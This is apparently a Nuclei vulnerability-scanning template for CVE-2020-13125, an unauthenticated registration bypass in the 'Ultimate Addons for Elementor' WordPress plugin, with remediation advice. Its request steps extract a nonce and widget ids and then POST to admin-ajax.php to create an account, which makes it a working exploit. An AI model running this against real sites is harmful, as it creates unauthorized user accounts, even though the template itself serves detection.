id: CVE-2020-13125

info:
  name: Ultimate Addons for Elementor <= 1.24.1 - Registration Bypass
  author: daffainfo
  severity: high
  description: |
    An issue was discovered in the "Ultimate Addons for Elementor" plugin before 1.24.2 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13126. Unauthenticated attackers can create users with the Subscriber role even if registration is disabled.
  impact: |
    Unauthenticated attackers can create user accounts with Subscriber role, potentially leading to further malicious activities or privilege escalation
  remediation: |
    Update to version 1.24.2 or later.
  reference:
    - https://www.wordfence.com/blog/2020/05/combined-attack-on-elementor-pro-and-ultimate-addons-for-elementor-puts-1-million-sites-at-risk/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13125
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2020-13125
    epss-score: 0.06554
    epss-percentile: 0.91384
    cwe-id: NVD-CWE-noinfo
    cpe: cpe:2.3:a:brainstormforce:ultimate_addons_for_elementor:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: brainstormforce
    product: ultimate_addons_for_elementor
    framework: wordpress
  tags: cve2020,cve,wp,wordpress,wp-plugin,brainstormforce,ultimate-addons-for-elementor,vkev

flow: |
  http(1)
  for (let widget_id of iterate(template.widgets_id)) {
    set("widget_id", widget_id)
    http(2)
  }

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "uaelRegistration", "form_nonce")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: form_nonce
        part: body
        group: 1
        regex:
          - ',"form_nonce":"([a-f0-9]+)"'
        internal: true

      - type: regex
        name: post_id
        part: body
        group: 1
        regex:
          - '"post":{"id":([0-9]+),'
        internal: true

      - type: regex
        name: widgets_id
        part: body
        group: 1
        regex:
          - 'elementor-widget-uael-registration-form" data-id="([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=uael_register_user&nonce={{form_nonce}}&data[page_id]={{post_id}}&data[widget_id]={{widget_id}}&data[user_name]={{username}}&data[email]={{email}}&data[password]={{password}}&data[first_name]={{firstname}}&data[last_name]={{lastname}}&data[send_email]={{randstr}}&data[auto_login]=yes

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'successfully registered'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a00463044022035d304b2a3e8c9b6627d4aa362076d686b8aa2aa3f42c1ca305fb9729324779b0220117e0689ee1df1298e048ace429c7bc8bf6df29dac7c0724c474a6aa8007a1b2:922c64590222798bb761d5b6d8e72950